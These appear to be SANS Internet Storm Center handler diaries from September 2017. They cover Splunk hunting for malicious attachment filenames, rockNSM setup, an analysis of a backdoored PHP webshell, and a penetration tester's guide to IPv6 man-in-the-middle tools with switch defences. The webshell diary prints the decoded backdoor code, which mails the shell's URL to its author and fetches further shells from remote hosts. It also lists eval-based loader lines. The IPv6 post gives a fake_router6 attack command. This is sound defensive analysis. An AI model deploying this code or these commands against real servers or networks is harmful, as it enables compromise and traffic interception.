Then I built a list of 94387 filenames based on the data that I have collected since the beginning of 2017. The best place to collect this data is your incoming mail server or the logs of any anti-spam or anti-malware solution. This is a good opportunity to remind you that logs are critical: log as much as possible! How do you check the filenames against all the regular expressions above and tag them with the second field ('Category')? To do this efficiently, I used Splunk.

The regular expressions are stored in the ‘maldocs_re.csv’ file and the filenames in ‘maldocs.csv’; the following query will return interesting statistics:

|inputlookup maldocs.csv |eval count=0 |join max=0 count [| inputlookup maldocs_re.csv | eval count=0] |eval test=if(match(filePath, Regex),1,0) |where test=1 |stats count by Category

After a few seconds or minutes, depending on the amount of data you have to process, you will get a nice graph like this:

You can see that most of the malicious files are based on media files, but we also have some hits in the 'Targeted' category. Those would be worth a closer look! Finally, if you define a single category called ‘Targeted’ with good regular expressions matching your business activity, domain names, login formats, brands or whatever, you can generate alerts when such files are sent to your users and be aware of potential targeted attacks!

Happy hunting!

Xavier Mertens (@xme)
ISC Handler - Freelance Security Consultant

September 18, 2017

ISC Stormcast For Monday, September 18th 2017;id=5672, (Mon, Sep 18th)

September 17, 2017

rockNSM as a Incident Response Package, (Sun, Sep 17th)

Are you looking for a lightweight system to be part of your Incident Response kit? This is probably the package for you. It contains all the basic elements needed to capture data on the fly with Suricata, Bro, Logstash, Kibana, Elasticsearch and Kafka, everything needed to conduct an investigation. Two options exist to build your system: you can use the ISO built on CentOS 7.3 or build your own, and obviously I recommend using the ISO; make sure you check the hardware requirements before starting. "The system you run this on should have at least 2 network interfaces and more than 8GB of RAM, with an OS (RHEL or CentOS 7) already installed."[2] The current version is 2.0.5 and I recommend reading the release notes.

This kit can also be used in a small network (a home network is a perfect place for it) as a complete IDS package. The current version has a small issue when installing via the ISO: when you see an option to create an account, make sure you create your own before continuing, otherwise you won't be able to log in.  After you complete the ISO installation, I recommend you run the following commands to complete the setup:

  • sudo su -
  • chown suricata:suricata /var/run/suricata
  • /opt/rocknsm/rock/bin/
  • /opt/rocknsm/rock/bin/
  • rock_status (check if everything is working)
  • rpm --import (install PGP key)
  • vi /etc/yum.repos.d/CentOS-Base.repo (gpgcheck and enable from 0 to 1)
  • yum clean all && yum check-update
  • yum update (Update all then reboot)
  • yum install bind-utils (optional if you need nslookup or dig)
  • http://IPADDRESS - to access Kibana (I recommend a static address)

Check this page for additional information to troubleshoot the system. Overall it is easy to install (~20 minutes), easy to use, and starts capturing traffic immediately. This is the output of one of the many Kibana dashboards, displaying an overview of the past 24 hours of Bro capture.


Guy Bruneau IPSS Inc.
Twitter: GuyBruneau
gbruneau at isc dot sans dot edu

September 16, 2017

VMware ESXi, vCenter Server, Fusion and Workstation updates resolve multiple security vulnerabilities -, (Sat, Sep 16th)

Guy Bruneau IPSS Inc.
Twitter: GuyBruneau
gbruneau at isc dot sans dot edu

September 15, 2017

ISC Stormcast For Friday, September 15th 2017;id=5670, (Fri, Sep 15th)

September 14, 2017

Another webshell, another backdoor!, (Thu, Sep 14th)

I’m still busy following how webshells are evolving… I recently found another backdoor in another webshell called “”. The best place to find webshells remains [1]. When I’m testing a webshell, I copy it to a VM located on a "wild Internet" VLAN in my home lab with, amongst other controls, full packet capture enabled. This way, I can spot immediately if the VM is trying to “phone home” to some external hosts. This was the case this time!

The web shell (SHA256: 518458a1d7d4b058adbd7dd8e283cc2762b444326b815d7c19ec4a333b2b2903) is unknown on VT. It requested another pastie[2] that is called at the beginning of the code:


The pastie is Base64 encoded and compressed. Here is the content:


This one is decoded as another bunch of Base64 data that, once decoded, contains:


The last code fetches a picture via the service called paceman.jpg. The picture looks normal: 

(Note: This is not the original one, this one has been sanitized)

If you read the EXIF[3] data, you’ll find indeed that the ‘UserComment’ field contains more Base64 data:

# exif -t UserComment pacman.jpg
EXIF entry 'User Comment' (0x9286, 'UserComment') exists in IFD 'EXIF':
  Tag: 0x9286 ('UserComment')
  Format: 7 ('Undefined')
  Components: 2824
  Size: 2824
  Value: ….

Once decoded, we have another set of Base64/gzipped/ROT13 data and again and again to finally get some interesting PHP code (only the relevant code is displayed to keep the diary short):

// ?0upload : shows the file upload form
if(isset($_GET["0upload"])){
    echo "$up";
}
/////////////////////////////
// ?0cek : discloses the password protecting the shell
if(isset($_GET["0cek"])){
    echo "Password E :".$auth_pass;
}
/////////////////////////////
// First run only: mail the shell's URL to the author, then drop an empty ".db" marker file
if (file_exists('.db')) {
} else {
    $to = "syedich@yahoo[.]com";
    $subject = $_SERVER['SERVER_NAME'];
    $header = "From: Mastah <jancok@matamucok[.]com>";
    $message = "Exploit : http://". $_SERVER['SERVER_NAME']. $_SERVER['REQUEST_URI'];
    mail($to, $subject, $message, $header);
    $m = fopen(".db", "w") or die (" ");
    $txt = "";
    fwrite($m, $txt);
    fclose($m);
    chmod(".db",0644);
}
/////////////////////////////
// ?0shell : fetches a second shell from a remote site and writes it as themes.php
if(isset($_GET["0shell"])){
    $anak1 = file_get_contents("hXXps://[.]com/site/bhshll123/bh.txt");
    $nggawe1 = fopen("themes.php","w") or die ("gabisa pak");
    fwrite($nggawe1,$anak1);
    fclose($nggawe1);
    header ("Location:themes.php");
    chmod("themes.php",0644);
}
//////////////////////////////
// ?0deface : fetches a defacement page from pastebin and writes it as 0x.htm
if(isset($_GET["0deface"])){
    $anak = file_get_contents("hXXp://pastebin[.]com/raw/6JA72K8m");
    $nggawe = fopen("0x.htm","w") or die ("gabisa pak");
    fwrite($nggawe,$anak);
    fclose($nggawe);
}

The external links on and aren’t available anymore but we can see interesting behaviors. Based on the GET parameter that is passed within the web shell URL, we have:

  • a form to upload more files to the compromised server (http://xxx?0upload)
  • a way to disclose the password used to restrict access to the web shell (http://xxx?0cek)
  • a shell interface (http://xxx?0shell)
  • a tool to deface (http://xxx?0deface)

You can also see that a mail is sent to a specific address with details to connect to the web shell (the empty ".db" file is written afterwards so that the notification is only sent once).

How to search for interesting/suspicious code in PHP? I'm using the Viper[4] framework to keep all my samples in a central place. The extraction of URLs, IP addresses and User-Agents often returns interesting findings:

Webshells viper qyt0dHv1.php > strings -N
[+] Network related:
- @import url(hXXps://fonts.googleapis[.]com/css?family=Abel);
- eval(gzinflate(base64_decode(file_get_contents('hXXp://pastebin[.]com/raw/6PJ9Pj8F'))));
- $_POST = idx_ss($_POST);
- CreateTools("wso","hXXp://pastebin[.]com/raw/3eh3Gej2");
- CreateTools("adminer"."hXXps://www.adminer[.]org/static/download/4.2.5/adminer-4.2.5.php");
- CreateTools("b374k","hXXp://pastebin[.]com/raw/rZiyaRGV");
- CreateTools("injection","hXXp://pastebin[.]com/raw/nxxL8c1f");
- CreateTools("promailerv2","hXXp://pastebin[.]com/raw/Rk9v6eSq");
- CreateTools("gamestopceker","hXXp://pastebin[.]com/raw/QSnw1JXV");
- CreateTools("bukapalapak","hXXp://pastebin[.]com/raw/6CB8krDi");
- CreateTools("tokopedia","hXXp://pastebin[.]com/dvhzWgby");
- CreateTools("encodedecode","hXXp://pastebin[.]com/raw/wqB3G5eZ");
- CreateTools("mailer","hXXp://pastebin[.]com/raw/9yu1DmJj");
- CreateTools("r57","hXXp://pastebin[.]com/raw/G2VEDunW");
- CreateTools("tokenpp","hXXp://pastebin[.]com/raw/72xgmtPL");
- CreateTools("extractor","hXXp://pastebin[.]com/raw/jQnMFHBL");
- CreateTools("bh","hXXp://pastebin[.]com/raw/3L2ESWeu");
- CreateTools("dhanus","hXXp://pastebin[.]com/raw/v4xGus6X");
- $ling="http://".$_SERVER['SERVER_NAME']."".$_SERVER['PHP_SELF']."?create";
[Stuff deleted]
- <a href="hXXp://hub.obsidiancyberteam[.]id/">Obsidian Cyber Team</a>';
- if(adminer("hXXps://www.adminer[.]org/static/download/4.2.4/adminer-4.2.4.php","adminer.php")) {
- curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6[.]1; rv:32.0) Gecko/20100101 Firefox/32.0");

Webshells viper qyt0dHv1.php > strings -I
[+] Various interesting strings:
- curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6[.]1; rv:32.0) Gecko/20100101 Firefox/32.0");
- curl_setopt($ch, CURLOPT_USERAGENT, 'Mozilla/5.0 (Windows; U; Windows NT 5[.]1; en-US; rv: Gecko/2009032609 Firefox/3.0.8');
- curl_setopt($curl, CURLOPT_USERAGENT, "Mozilla/4.0 (compatible; MSIE 6[.]0; Windows NT 5[.]1; SV1; .NET CLR 1.1[.]4322; .NET CLR 2.0[.]50727)"); //msnbot/1.0 (+hXXp://search.msn[.]com/msnbot.htm)
- curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6[.]1; rv:32.0) Gecko/20100101 Firefox/32.0");

Also search for interesting functions like file_get_contents(), eval() or system().
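To unwrap the kind of nesting described above (Base64, gzinflate and ROT13 stacked "again and again") without executing the sample, here is an added Python decoder that is not part of the diary and not a Viper feature: it tries each single-layer undo a dropper could have applied and keeps a result only when it still looks like text, base64 or PHP. make_sample() builds a constructed stand-in for the pastie, not the real one.

```python
import base64, binascii, codecs, re, zlib

PHP_MARKERS = (b"<?php", b"$_GET", b"$_POST", b"$_SERVER", b"eval(")

def looks_like_php(b):
    return any(m in b for m in PHP_MARKERS)

def rot13(b):  # ROT13 moves ASCII letters only, so latin-1 round-trips arbitrary bytes losslessly
    return codecs.encode(b.decode("latin-1"), "rot_13").encode("latin-1")

def b64(b):  # decode only a blob made wholly of base64 alphabet, i.e. what base64_decode() consumes
    s = re.sub(rb"\s+", b"", b)
    if len(s) < 16 or len(s) % 4 or not re.fullmatch(rb"[A-Za-z0-9+/]+={0,2}", s):
        return None
    try: return base64.b64decode(s, validate=True)
    except binascii.Error: return None

def textual(b):  # PHP, base64 text, or mostly printable ASCII: a layer worth keeping
    printable = sum(32 <= c < 127 or c in (9, 10, 13) for c in b) / max(len(b), 1)
    return looks_like_php(b) or b64(b) is not None or printable > 0.95

def inflate(b):  # undo gzinflate() (raw deflate, wbits -15) or gzdecode()/gzuncompress() (wbits 47)
    for wbits in (-15, 47):  # random bytes occasionally "inflate", so keep only text-like output
        try: out = zlib.decompress(b, wbits)
        except zlib.error: continue
        if textual(out): return out
    return None

def candidates(cur):  # every single-layer undo a dropper might have applied: (PHP name, bytes or None)
    yield "base64_decode", b64(cur)
    # base64 and ROT13'd base64 share one alphabet, so the rotated reading must be tried too
    yield "str_rot13+base64_decode", b64(rot13(cur))
    yield "str_rot13", rot13(cur) if looks_like_php(rot13(cur)) else None
    yield "gzinflate", inflate(cur)

def peel(blob, max_layers=32):
    """Strip layers until PHP appears; returns (final bytes, [PHP decoder names in removal order])."""
    cur, layers = blob, []
    while len(layers) < max_layers and not looks_like_php(cur):
        step = next(((n, c) for n, c in candidates(cur) if c and (textual(c) or inflate(c))), None)
        if step is None:
            break
        cur, layers = step[1], layers + [step[0]]
    return cur, layers

def make_sample():  # constructed stand-in for the diary's pastie: base64(gzdeflate(str_rot13(base64(php))))
    php = b'<?php if(isset($_GET["0shell"])) { echo "stage"; } ?>'
    deflater = zlib.compressobj(wbits=-15)  # raw deflate, as PHP's gzdeflate() emits
    inner = rot13(base64.b64encode(php))
    return base64.b64encode(deflater.compress(inner) + deflater.flush()), php
```

The layer list that peel() returns is the decoder chain you would otherwise have to read out of nested eval() calls, so it doubles as a quick fingerprint of the dropper.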

While googling for indicators in the code, I found references to similar webshells reported in 2016. So the code is not new but seems to still be maintained and deployed in the wild. Another good reason to remind you to NEVER install such webshells on production servers. Most of them contain malicious code and backdoors! And of course, web servers should not have direct access to the Internet!


Xavier Mertens (@xme)
ISC Handler - Freelance Security Consultant

14 September 2017

ISC Stormcast For Thursday, September 14th 2017;id=5668, (Thu, Sep 14th)

13 September 2017

No IPv6? Challenge Accepted! (Part 1), (Wed, Sep 13th)

I recently had an internal penetration test with a client.  During the initial discussions, where the client set the scope and so on, I asked if they had any IPv6 in their environment (mainly because I'm hoping that someday, someone will say yes).  Their answer was an emphatic "no".  My answer to that was "Challenge Accepted?", and they ruled IPv6 in scope with a "knock yourself out, there's nothing there".

As many of you know, IPv6 is enabled on most modern operating systems, and if a path is found, IPv6 is usually preferred over IPv4.  In most organizations though, IPv6 is disabled on the routers and firewalls - so there's nowhere for IPv6 to go and no way for IPv6 to be auto-configured (aside from Locally Administered Addressing).  That is, until there's a malicious actor (that'd be me) in the environment.

You don't have to look far for tools to exploit the IPv6 protocol.  Kali has the most excellent THC IPv6 Attack Toolkit installed.  Using this toolkit is pretty straightforward (I only list the tools I commonly use below):

Enumeration Tools:
alive6 is a quick and dirty "what IPv6 hosts are on my network segment?" tool
dump_router6 will (as you'd expect) dump any IPv6 routers on the local segment.  In a production environment, "netstat -rn" will usually do the trick also.
passive_discovery6 combines a number of features, doing passive discovery of the entire network segment and lifting all the information from the IPv6 multicast packets (IPv6 uses multicast where IPv4 uses broadcasts such as ARP).

Attack Tools:
fake_dhcps6 and fake_dns6d stand up malicious DHCP and DNS servers, which allow you to give victim hosts "real" IPv6 addresses that can be routed, and resolve DNS queries to malicious IPv6 host addresses.
fake_router26 and fake_router6 are the "go to" Man in the Middle attack tools for IPv6 - these allow you to stand up a default router for IPv6, which will be preferred over existing IPv4 routers.  Note that you need to set up a mechanism to forward IPv6 packets.  This means you need to enable IPv6 forwarding, then either tunnel IPv6 outbound, usually to an internet gateway, or NAT/proxy the IPv6 packets back to IPv4 (which you then forward to the "real" IPv4 router).  What this means is that there's some thought and preparation required to mount this attack.

Mounting an IPv6 Man in the Middle attack is as simple as: "fake_router6 eth0  BAD1::00/64" (the last parameter is the network - either your "fake" IPv6 network, or your customer's real IPv6 network).  Note that you then have to do the other half - send the victim stations' packets on to their destination (stay tuned for that in my next post).

kill_router6 allows you to take any production IPv6 router offline.  So far I haven't needed this tool, IPv6 just isn't widely implemented in corporate clients I generally work with.

More info on using the THC attack toolkit can be found here:

Defenses against these attacks?
The defenses against IPv6 router hijack attacks lie primarily in an organization's switches.  Enable a feature called "RA Guard" on the access ports to simply block Router Advertisements (this defends against the fake router attack tools):
int Ethernet x/y
    ipv6 nd raguard

If you don't have an IPS on every segment, enabling RA Guard on switches will create a syslog event - you can monitor for that with your SIEM, or even easier, look for it directly on your syslog server.  The log entry you are looking for is:
"ICMPv6-ND: Received RA from FE80::1 on Vlan72"  (of course the vlan number will vary)
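As an added example, not part of the diary, a small Python script that watches syslog for the RA Guard message quoted above and reports every source/VLAN pair that announced itself as an IPv6 router. The hostname and timestamps in the sample lines are constructed, and the allow-list of production IPv6 VLANs is an assumed parameter (empty on an IPv4-only network, so every RA is a finding).

```python
import re
from collections import Counter

# Message text of the RA Guard syslog entry quoted in the diary; the syslog prefix before it varies
RA_LINE = re.compile(r"ICMPv6-ND: Received RA from (?P<src>[0-9A-Fa-f:]+) on (?P<intf>\S+)")

def parse_ra_events(lines):
    """Yield (source link-local address, interface) for every RA Guard drop found in syslog."""
    for line in lines:
        m = RA_LINE.search(line)
        if m:
            yield m.group("src").upper(), m.group("intf")   # normalise case so FE80::1 == fe80::1

def rogue_ra_report(lines, production_ipv6_vlans=frozenset()):
    """Count RAs per (source, interface) and keep those on segments where no IPv6 router belongs.
    On an IPv4-only network production_ipv6_vlans stays empty, so every RA is a finding."""
    counts = Counter(parse_ra_events(lines))
    return {key: n for key, n in counts.items() if key[1] not in production_ipv6_vlans}

# Constructed sample syslog (hostname and timestamps invented; message text as quoted in the diary)
SAMPLE_SYSLOG = """\
Sep 13 10:01:02 sw-access-3: ICMPv6-ND: Received RA from FE80::1 on Vlan72
Sep 13 10:01:05 sw-access-3: ICMPv6-ND: Received RA from FE80::1 on Vlan72
Sep 13 10:01:09 sw-access-3: ICMPv6-ND: Received RA from fe80::1 on Vlan72
Sep 13 10:01:11 sw-access-3: ICMPv6-ND: Received RA from FE80::5054:FF:FE12:3456 on Vlan10
Sep 13 10:02:00 sw-access-3: %LINK-3-UPDOWN: Interface GigabitEthernet1/0/7, changed state to up
"""

if __name__ == "__main__":
    for (src, intf), n in rogue_ra_report(SAMPLE_SYSLOG.splitlines()).items():
        print(f"rogue IPv6 router candidate {src} on {intf}: {n} RA(s) blocked by RA Guard")
```

A burst of RAs from one link-local source in a few seconds, as in the sample, is what fake_router6 produces; the source address identifies the port to look at with the switch's MAC table.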

Configuring a policy for Neighbor Discovery (ND) inspection can defend against the IPv6 reconnaissance tools:
ipv6 nd inspection policy NDPOLICY
    sec-level minimum 2
    device-role monitor

int Ethernet x/y
    ipv6 nd inspection attach-policy NDPOLICY vlan add all

Then don't configure any "trusted" ports for RA (Router Advertisements).

Of course, on any segment where you have an IPS sensor you can use that too.  If you don't have IPv6 running in production, then any IPv6 RA packets, DNS responses from a local IP, or DHCPv6 responses you detect should all be classified as attacks and dealt with with some sense of priority.

Cisco covers IPv6 First Hop Security in much more detail here: - I'd recommend looking at encryption and signing of the IPv6 infrastructure functions if you're standing up an IPv6 infrastructure, and not just defending against rogue IPv6 in an IPv4 network.

Stay tuned, in the next installments to this story I'll cover some handy IPv6 NAT/Proxy attack techniques, a soup-to-nuts IPv6 based Man in the Middle attack, as well as defenses you can implement on firewalls.

Have I missed anything important in this post?  Do you use a different set of tools to attack IPv6 - maybe Scapy or Metasploit?  Please, post your tools or approaches for discussion in our comment form.

Rob VandenBrink

